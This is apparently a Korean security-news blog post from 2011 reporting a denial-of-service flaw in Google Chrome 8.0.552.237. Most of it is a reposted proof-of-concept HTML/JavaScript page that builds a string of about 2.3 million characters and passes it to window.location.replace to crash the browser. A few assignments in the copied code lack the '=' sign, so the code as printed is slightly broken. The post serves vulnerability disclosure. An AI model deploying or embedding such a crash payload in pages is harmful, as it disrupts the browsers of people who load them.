본문 바로가기
취약점소식

[Google] Google Chrome v8.0.552.237 .replace DOS

by 잡다한 처리 2011. 1. 31.
반응형




구글 크롬(Google Chrome)의 최신버전에 대한 취약점이 발표되었다.
항상 IE나 FF에만 신경을 썻지, 구글 크롬은 안전하겠거니 라는 안일한 생각을 해왔었는데~ 이제 크롬도 더이상 안전지대가 아니네요 ㅠㅠ


- POC 코드(이 코드로 인하여 블로그가 구글 또는 IE8에서 악성으로 탐지 될 수 있습니다^^)
<html>
<head>
  
  
# Exploit Title: Google Chrome v8.0.552.237 .replace DOS
# Date: January 30 2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: http://www.google.com/chrome
# Version: v8.0.552.237
# Tested on: Windows xp sp3 ,windows 7 ,linux running on VMware Fusion 3.1 and VirtualBox 3.2.8
   
   
#  mail----> shogilord^gmail.com spams are welcome!!!!!
#    ________  _    _________   ____ __ _____   ________
#   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
#  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __
# / /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ /
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/
   
# COLOMBIA hacking presents.............
#   
# Google Check the replace
#
 
  
<script type="text/javascript">
  
function mul(str,count){
    if(count==0) return '';
    var binaryCount = count.toString(2);
    var numDegree = binaryCount.length;
    var resultStr='';
    for(var i=0; i<numDegree; i++){
        resultStr+=resultStr;
        if(binaryCount.charAt(i) == '1'){
            resultStr+=str;
        }
    }
    return resultStr;
}
  
var junka "a";
  
var junk mul(junka,2304453);
  
  
window.location.replace("http://" + junk);
  
</script>
</head>
<body>
  
</body>
</html>

댓글